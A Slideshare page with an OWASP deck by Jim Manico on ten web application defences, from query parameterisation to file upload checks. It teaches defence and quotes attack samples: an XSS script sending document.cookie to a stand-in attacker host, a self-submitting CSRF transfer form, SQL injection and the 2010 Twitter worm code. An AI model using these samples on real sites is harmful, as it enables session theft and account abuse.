Jim Manico, profile picture
Uploaded byJim Manico
PPT, PDF16,208 views

Top Ten Web Application Defenses v12

The document outlines the top ten web application defenses, emphasizing that developers need to be aware of numerous security issues beyond a simple top ten list. It discusses key concepts such as SQL injection, password storage, multi-factor authentication, XSS defenses, and CSRF protections, providing numerous examples and best practices for each. The document serves as a comprehensive resource aimed at enhancing security in web application development.

Embed presentation

Downloaded 210 times
Top Ten Web Application Defenses
Jim Manico @manicode OWASP Volunteer - Global OWASP Board Member - OWASP Cheat-Sheet Series Project Manager and Contributor VP Sec Architecture, WhiteHat Security - 16 years of web-based, databasedriven software development and analysis experience - Secure coding educator/author Kama'aina Resident of Kauai, Hawaii - Aloha!
WARNING THIS IS AN AWARENESS DOCUMENT. THERE ARE MORE THAN 10 ISSUES THAT DEVELOPERS NEED TO BE AWARE OF. YOU CANNOT BASE AN APPSEC PROGRAM OFF OF A TOP TEN LIST.
ATTACKS IN-THE-WILD WASC: Web Hacking Incident Database http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
[1] ';
Anatomy of a SQL Injection Attack $NEW_EMAIL = Request['new_email']; update users set email='$NEW_EMAIL' where id=132005;
Anatomy of a SQL Injection Attack 1. SUPER AWESOME HACK: $NEW_EMAIL = '; 2. update users set email='$NEW_EMAIL' where id=132005; 3. update users set email='';--' where id=132005;
Query Parameterization (PHP PDO) $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
Query Parameterization (.NET) SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
Query Parameterization (Java) String newName = request.getParameter("newName"); String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
Query Parameterization Failure (Ruby on Rails) # Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update project.update_attributes(:name => 'owasp')
Query Parameterization (Cold Fusion) <cfquery name="getFirst" dataSource="cfsnippets"> SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER"> </cfquery>
Query Parameterization (PERL DBI) my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )"; my $sth = $dbh->prepare( $sql ); $sth->execute( $bar, $baz );
[2] Password Defenses Disable Browser Autocomplete <form AUTOCOMPLETE="off"> <input AUTOCOMPLETE="off"> Only send passwords over HTTPS POST Do not display passwords in browser Input type=password Store password based on need Use a salt (de-duplication) SCRYPT/PBKDF2 (slow, performance hit, easy) HMAC (requires good key storage, tough)
Password Storage in the Real World 1) Do not limit the type of characters or length of user password • Limiting passwords to protect against injection is doomed to failure • Use proper encoder and other defenses described instead
Password Storage in the Real World 2) Use a cryptographically strong credential-specific salt •protect( [salt] + [password] ); •Use a 32char or 64char salt (actual size dependent on protection function); •Do not depend on hiding, splitting, or otherwise obscuring the salt
Leverage Keyed Functions 3a) Impose difficult verification on [only] the attacker (strong/fast) •HMAC-SHA-256( [private key], [salt] + [password] ) •Protect this key as any private key using best practices •Store the key outside the credential store •Upholding security improvement over (solely) salted schemes relies on proper key creation and management
Password Storage in the Real World 3b) Impose difficult verification on the attacker and defender (weak/slow) •pbkdf2([salt] + [password], c=10,000,000); •PBKDF2 when FIPS certification or enterprise support on many platforms is required •Scrypt where resisting any/all hardware accelerated attacks is necessary but support isn’t.
[3] Multi Factor Authentication Google, Facebook, PayPal, Apple, AWS, Dropbox, Twitter Blizzard's Battle.Net, Valve's Steam, Yahoo
Basic MFA Considerations • Where do you send the token? – Email (worst) – SMS (ok) – Mobile native app (good) – Dedicated token (great) – Printed Tokens (interesting) • How do you handle thick clients? – Email services, for example – Dedicated and strong per-app passwords 20
Basic MFA Considerations • How do you handle unavailable MFA devices? – Printed back-up codes – Fallback mechanism (like email) – Call in center • How do you handle mobile apps? – When is MFA not useful in mobile app scenarios? 21
Forgot Password Secure Design Require identity questions Last name, account number, email, DOB Enforce lockout policy Ask one or more good security questions https://www.owasp.org/index.php/Choosing_and_Using_Security_ Questions_Cheat_Sheet Send the user a randomly generated token via out-of-band email, SMS or token Verify code in same web session Enforce lockout policy Change password Enforce password policy
[4] Anatomy of a XSS Attack <script > var badURL=‘https://evileviljim.com/somesit e/data=‘ + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML=‘<blink >CYBER IS COOL</blink>’;</script>
Contextual Output Encoding (XSS Defense) – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
XSS Defense by Data Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
<
&lt;
OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project • No third party libraries or configuration necessary • This code was designed for high-availability/highperformance encoding functionality • Simple drop-in encoding functionality • Redesigned for performance • More complete API (uri and uri component encoding, etc) in some regards. • Java 1.5+ • Last updated February 14, 2013 (version 1.1)
OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project The Problem The Problem Web Page built in Java JSP is vulnerable to XSS Web Page built in Java JSP is vulnerable to XSS The Solution The Solution 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 3) <button 3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> click me click me </button> </button> 4) <script type="text/javascript"> 4) <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(message) %>"; var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg); alert(msg); </script> </script>
OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project HTML Contexts Encode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute (String) XML Contexts Encode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String) CSS Contexts Encode#forCssString(String) Encode#forCssUrl(String) JavaScript Contexts Encode#forJavaScript(String) Encode#forJavaScriptAttribute(String) Encode#forJavaScriptBlock(String) Encode#forJavaScriptSource(String) URI/URL contexts Encode#forUri(String) Encode#forUriComponent(String)
OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project <script src="/my-server-side-generated-script"> <script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet {{ class MyServerSideGeneratedScript extends HttpServlet void doGet(blah) {{ void doGet(blah) response.setContentType("text/javascript; charset=UTF-8"); response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); "');"); w.println("}"); w.println("}"); }} }}
Other Encoding Libraries • Ruby on Rails – http://api.rubyonrails.org/classes/ERB/Util.html • Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP – https://www.owasp.org/index.php/ Category:OWASP_Encoding_Project • ESAPI – PHP.NET, Python, Classic ASP, Cold Fusion – https://www.owasp.org/index.php/ Category:OWASP_Enterprise_Security_API • .NET AntiXSS Library – http://wpl.codeplex.com/releases/view/80289
OWASP HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. • This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-htmlsanitizer/wiki/AttackReviewGroundRules. • Very easy to use. • It allows for simple programmatic POSITIVE policy configuration. No XML config. • Actively maintained by Mike Samuel from Google's AppSec team! • This is code from the Caja project that was donated by Google. It is rather high performance and low memory utilization. OWASP
Solving Real World Problems with the OWASP HTML Sanitizer Project The Problem The Problem Web Page is vulnerable to XSS because of untrusted HTML Web Page is vulnerable to XSS because of untrusted HTML The Solution The Solution PolicyFactory policy = new HtmlPolicyBuilder() PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowElements("a") .allowUrlProtocols("https") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .requireRelNofollowOnLinks() .build(); .build(); String safeHTML = policy.sanitize(untrustedHTML); String safeHTML = policy.sanitize(untrustedHTML);
Other HTML Sanitizers • Pure JavaScript – http://code.google.com/p/googlecaja/wiki/JsHtmlSanitizer • Python – https://pypi.python.org/pypi/bleach • PHP – http://htmlpurifier.org/ – http://www.bioinformatics.org/phplabware/internal_u tilities/htmLawed/ • .NET – AntiXSS.getSafeHTML/getSafeHTMLFragment – http://htmlagilitypack.codeplex.com/ • Ruby on Rails – http://api.rubyonrails.org/classes/HTML.html
DOM-Based XSS Defense • JavaScript encode and delimit untrusted data as quoted strings • Avoid use of HTML rendering methods like innerHTML – If you must do this, then sanitize untrusted HTML first • Avoid code execution contexts – eval(), setTimeout() or event handlers • When possible, treat untrusted data as display text only • Use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…), etc. to build dynamic interfaces • Parse JSON with JSON.parse in the browser
 SAFE use of JQuery $(‘#element’).text(UNTRUSTED DATA);  UNSAFE use of JQuery  $(‘#element’).html(UNTRUSTED DATA); 
Dangerous jQuery 1.7.2 Data Types CSS Some Attribute Settings HTML URL (Potential Redirect) jQuery methods that directly update DOM or can execute JavaScript $() or jQuery() .attr() .add() .css() .after() .html() .animate() .insertAfter() .append() .insertBefore() .appendTo() Note: .text() updates DOM, but is safe. jQuery methods that accept URLs to potentially unsafe content jQuery.ajax() jQuery.post() jQuery.get() load() jQuery.getScript() 39
Content Security Policy • Anti-XSS W3C standard http://www.w3.org/TR/CSP/ • Move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
[5] Cross Site Request Forgery Defense <img src="https://google.com/logo.png"> <img src="https://google.com/deleteMail/7/confirm=true"> <form method="POST" action="https://mybank.com/transfer"> <input type="hidden" name="account" value="23532632"/> <input type="hidden" name="amount" value="1000"/> </form> <script>document.forms[0].submit()</script>
Real World CSRF – Netflix (2008) <html> <head> <script language="JavaScript" type="text/javascript"> function load_image2() { var img2 = new Image(); img2.src="http://www.netflix.com/MoveToTop?movieid=70110672&fromq=true"; } </script> </head> <body> <img src="http://www.netflix.com/JSON/AddToQueue?movieid=70110672" width="1" height="1" border="0"> <script>setTimeout( 'load_image2()', 2000 );</script> </body> </html>
Twitter XSS/CSRF Worm Code (2010) var content = document.documentElement.innerHTML; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(content);authtoken = authtoken[1]; //alert(authtoken); var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a '); var ajaxConn = new XHConn();ajaxConn.connect("/status/update","POST”,"authenticit y_token=" + authtoken+"&status=" + updateEncode + "&tab=home&update=update"); var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+ authtoken+"&user[url]="+xss+"&tab=home&update=update");
Recent CSRF Attacks (2012)
CSRF Tokens and Re-authentication – Cryptographic Tokens • Primary and most powerful defense • XSS Defense Required – Require users to re-authenticate
Re-authentication
[6] Controlling Access if ((user.isManager() || user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) { //execute action } How do you change the policy of this code?
Apache SHIRO http://shiro.apache.org/ • Apache Shiro is a powerful and easy to use Java security framework. • Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management. • Built on sound interface-driven design and OO principles. • Enables custom behavior. • Sensible and secure defaults for everything.
Solving Real World Access Control Problems with the Apache Shiro The Problem The Problem Web Application needs secure access control mechanism Web Application needs secure access control mechanism The Solution The Solution if ( currentUser.isPermitted( "lightsaber:wield" ) ) { if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); log.info("You may use a lightsaber ring. Use it wisely."); } else { } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); log.info("Sorry, lightsaber rings are for schwartz masters only."); } }
Solving Real World Access Control Problems with the Apache Shiro The Problem The Problem Web Application needs to secure access to aaspecific object Web Application needs to secure access to specific object The Solution The Solution int winnebagoId = request.getInt("winnebago_id"); int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); log.info("Sorry, you aren't allowed to drive this winnebago!"); } }
[7] Anatomy of a Clickjacking Attack
X-Frame-Options // to prevent all framing of this content response.addHeader( "X-FRAME-OPTIONS", "DENY" ); // to allow framing of this content only by this site response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" ); // to allow framing from a specific domain response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
Legacy Browser Clickjacking Defense <style id="antiCJ">body{display:none !important;}</style> <script type="text/javascript"> if (self === top) { var antiClickjack = document.getElementByID("antiCJ"); antiClickjack.parentNode.removeChild(antiClickjack) } else { top.location = self.location; } </script>
[8] App Layer Intrusion Detection • Great detection points to start with – Input validation failure server side when client side validation exists – Input validation failure server side on non-user editable parameters such as hidden fields, checkboxes, radio buttons or select lists – Forced browsing to common attack entry points (e.g. /admin/secretlogin.jsp) or honeypot URL (e.g. a fake path listed in /robots.txt)
App Layer Intrusion Detection • Others – Blatant SQLi or XSS injection attacks – Workflow sequence abuse (e.g. multi-part form in wrong order) – Custom business logic (e.g. basket vs catalogue price mismatch)
OWASP AppSensor (Java) • Project and mailing list https://www.owasp.org/index.php/OWASP_ AppSensor_Project • Four-page briefing, Crosstalk, Journal of Defense Software Engineering • http://www.crosstalkonline.org/storage/issue -archives/2011/201109/201109-Watson.pdf
[9] Encryption in Transit (HTTPS/TLS) • Confidentiality, Integrity (in Transit) and Authenticity – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL – Starting when the login form is rendered until logout is complete • HTTPS configuration best practices – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Shee t • HSTS (Strict Transport Security) – http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000 • Certificate Pinning – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Certificate Pinning • What is Pinning – Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated certificate attempts to act like the real server • 2 Types of pinning – Carry around a copy of the server’s public key; – Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance • Note of the server’s public key on first use (Trust-on-FirstUse, Tofu) – Useful when no a priori knowledge exists, such as SSH or a Browser • https://www.owasp.org/index.php/Pinning_Cheat_Sheet
[10] • • • • • File Upload Security Upload Verification – Filename and Size validation + antivirus Upload Storage – Use only trusted filenames + separate domain Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml". Image Upload Verification – Enforce proper image size limits – Use image rewriting libraries – Set the extension of the stored image to be a valid image extension – Ensure the detected content type of the image is safe Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar) – Ensure structured uploads such as an add-on follow proper standard
How I learned to stop worrying and love the WAF
[11] Virtual Patching “A security policy enforcement layer which prevents the exploitation of a known vulnerability”
Virtual Patching Rationale for Usage – No Source Code Access – No Access to Developers – High Cost/Time to Fix Benefit – Reduce Time-to-Fix – Reduce Attack Surface
OWASP ModSecurity Core Rule Set http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
THANK YOU! @manicode jim@owasp.org jim.manico@whitehatsec.com http://slideshare.com/jimmanico

More Related Content

PPT
Top Ten Proactive Web Security Controls v5
byJim Manico
 
PPTX
Top Ten Java Defense for Web Applications v2
byJim Manico
 
PPTX
Cross Site Scripting (XSS) Defense with Java
byJim Manico
 
PDF
Development Security Framework based on Owasp Esapi for JSF2.0
byRakesh Kachhadiya
 
PPTX
RSA Europe 2013 OWASP Training
byJim Manico
 
PPTX
Access Control Pitfalls v2
byJim Manico
 
PPTX
XSS Defence with @manicode and @eoinkeary
byEoin Keary
 
PPTX
Web Application Defences
byDamilola Longe, CISSP, CCSP, MSc
 
Top Ten Proactive Web Security Controls v5
byJim Manico
 
Top Ten Java Defense for Web Applications v2
byJim Manico
 
Cross Site Scripting (XSS) Defense with Java
byJim Manico
 
Development Security Framework based on Owasp Esapi for JSF2.0
byRakesh Kachhadiya
 
RSA Europe 2013 OWASP Training
byJim Manico
 
Access Control Pitfalls v2
byJim Manico
 
XSS Defence with @manicode and @eoinkeary
byEoin Keary
 
Web Application Defences
byDamilola Longe, CISSP, CCSP, MSc
 

What's hot

KEY
DVWA BruCON Workshop
bytestuser1223
 
PPTX
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
PPTX
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
byMohammed ALDOUB
 
PPTX
Ten Commandments of Secure Coding
byMateusz Olejarka
 
PPTX
Java Secure Coding Practices
byOWASPKerala
 
PDF
Beyond OWASP Top 10 - Hack In Paris 2017
byAaron Hnatiw
 
PDF
Two scoops of Django - Security Best Practices
bySpin Lai
 
PPTX
Build A Killer Client For Your REST+JSON API
byStormpath
 
PPTX
W3 conf hill-html5-security-realities
byBrad Hill
 
PDF
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
PDF
OWASP Portland - OWASP Top 10 For JavaScript Developers
byLewis Ardern
 
PDF
Web Application Firewall: Suckseed or Succeed
byPrathan Phongthiproek
 
PPTX
Java Security Framework's
byMohammed Fazuluddin
 
PPT
XSS - Attacks & Defense
byBlueinfy Solutions
 
PDF
Android Pentesting
byn|u - The Open Security Community
 
PPTX
Deep dive into Java security architecture
byPrabath Siriwardena
 
PDF
OWASP London - So you thought you were safe using AngularJS.. Think again!
byLewis Ardern
 
PPTX
Elegant Rest Design Webinar
byStormpath
 
PPTX
Build a Node.js Client for Your REST+JSON API
byStormpath
 
DVWA BruCON Workshop
bytestuser1223
 
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
Case Study of Django: Web Frameworks that are Secure by Default
byMohammed ALDOUB
 
Ten Commandments of Secure Coding
byMateusz Olejarka
 
Java Secure Coding Practices
byOWASPKerala
 
Beyond OWASP Top 10 - Hack In Paris 2017
byAaron Hnatiw
 
Two scoops of Django - Security Best Practices
bySpin Lai
 
Build A Killer Client For Your REST+JSON API
byStormpath
 
W3 conf hill-html5-security-realities
byBrad Hill
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
byLewis Ardern
 
Web Application Firewall: Suckseed or Succeed
byPrathan Phongthiproek
 
Java Security Framework's
byMohammed Fazuluddin
 
XSS - Attacks & Defense
byBlueinfy Solutions
 
Android Pentesting
byn|u - The Open Security Community
 
Deep dive into Java security architecture
byPrabath Siriwardena
 
OWASP London - So you thought you were safe using AngularJS.. Think again!
byLewis Ardern
 
Elegant Rest Design Webinar
byStormpath
 
Build a Node.js Client for Your REST+JSON API
byStormpath
 

Similar to Top Ten Web Application Defenses v12

PDF
Application Security around OWASP Top 10
bySastry Tumuluri
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
PDF
How to secure web applications
byMohammed A. Imran
 
PPTX
Web application Security
byLee C
 
PPT
Top Ten Web Defenses - DefCamp 2012
byDefCamp
 
PPT
Intro to Web Application Security
byRob Ragan
 
PPTX
Owasp web security
byPankaj Kumar Sharma
 
PPTX
Defending web applications v.1.0
byTodd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
PDF
Session4-Authentication
byzakieh alizadeh
 
PPT
Web Apps Security
byVictor Bucutea
 
PPT
Security Tech Talk
byMallikarjun Reddy
 
PPT
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
byXlator
 
PPTX
Open source security
bylrigknat
 
PDF
Owasp top 10 web application security hazards - Part 1
byAbhinav Sejpal
 
PPSX
Web Security
bySupankar Banik
 
PDF
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
bySam Bowne
 
PDF
Owasp Top 10
byGaurav Narwani
 
PDF
Devbeat Conference - Developer First Security
byMichael Coates
 
PPTX
07 application security fundamentals - part 2 - security mechanisms - data ...
byappsec
 
PDF
My app is secure... I think
byWim Godden
 
Application Security around OWASP Top 10
bySastry Tumuluri
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
How to secure web applications
byMohammed A. Imran
 
Web application Security
byLee C
 
Top Ten Web Defenses - DefCamp 2012
byDefCamp
 
Intro to Web Application Security
byRob Ragan
 
Owasp web security
byPankaj Kumar Sharma
 
Defending web applications v.1.0
byTodd Benson (I.T. SPECIALIST and I.T. SECURITY)
 
Session4-Authentication
byzakieh alizadeh
 
Web Apps Security
byVictor Bucutea
 
Security Tech Talk
byMallikarjun Reddy
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
byXlator
 
Open source security
bylrigknat
 
Owasp top 10 web application security hazards - Part 1
byAbhinav Sejpal
 
Web Security
bySupankar Banik
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
bySam Bowne
 
Owasp Top 10
byGaurav Narwani
 
Devbeat Conference - Developer First Security
byMichael Coates
 
07 application security fundamentals - part 2 - security mechanisms - data ...
byappsec
 
My app is secure... I think
byWim Godden
 

Recently uploaded

PDF
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
PPTX
Code Like Bro -A guide for better Coding
byMadan Panthi
 
PDF
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PDF
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
PPTX
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
PDF
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
PDF
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
PDF
Real-Time AI at Scale Masterclass - Challenges of AI at Scale
byScyllaDB
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
PDF
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
PPTX
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
PDF
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
PDF
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
PPTX
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
PDF
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
PDF
Real-Time AI Masterclass: Vector Search at Scale
byScyllaDB
 
PDF
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
PDF
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
Code Like Bro -A guide for better Coding
byMadan Panthi
 
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
Real-Time AI at Scale Masterclass - Challenges of AI at Scale
byScyllaDB
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
Real-Time AI Masterclass: Vector Search at Scale
byScyllaDB
 
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 

Top Ten Web Application Defenses v12

  • 1.
  • 2.
    Jim Manico @manicode OWASP Volunteer -Global OWASP Board Member - OWASP Cheat-Sheet Series Project Manager and Contributor VP Sec Architecture, WhiteHat Security - 16 years of web-based, databasedriven software development and analysis experience - Secure coding educator/author Kama'aina Resident of Kauai, Hawaii - Aloha!
  • 3.
    WARNING THIS IS ANAWARENESS DOCUMENT. THERE ARE MORE THAN 10 ISSUES THAT DEVELOPERS NEED TO BE AWARE OF. YOU CANNOT BASE AN APPSEC PROGRAM OFF OF A TOP TEN LIST.
  • 4.
    ATTACKS IN-THE-WILD WASC: WebHacking Incident Database http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
  • 5.
  • 6.
    Anatomy of aSQL Injection Attack $NEW_EMAIL = Request['new_email']; update users set email='$NEW_EMAIL' where id=132005;
  • 7.
    Anatomy of aSQL Injection Attack 1. SUPER AWESOME HACK: $NEW_EMAIL = '; 2. update users set email='$NEW_EMAIL' where id=132005; 3. update users set email='';--' where id=132005;
  • 8.
    Query Parameterization (PHPPDO) $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 9.
    Query Parameterization (.NET) SqlConnectionobjConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
  • 10.
    Query Parameterization (Java) StringnewName = request.getParameter("newName"); String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
  • 11.
    Query Parameterization Failure (Rubyon Rails) # Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update project.update_attributes(:name => 'owasp')
  • 12.
    Query Parameterization (ColdFusion) <cfquery name="getFirst" dataSource="cfsnippets"> SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER"> </cfquery>
  • 13.
    Query Parameterization (PERLDBI) my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )"; my $sth = $dbh->prepare( $sql ); $sth->execute( $bar, $baz );
  • 14.
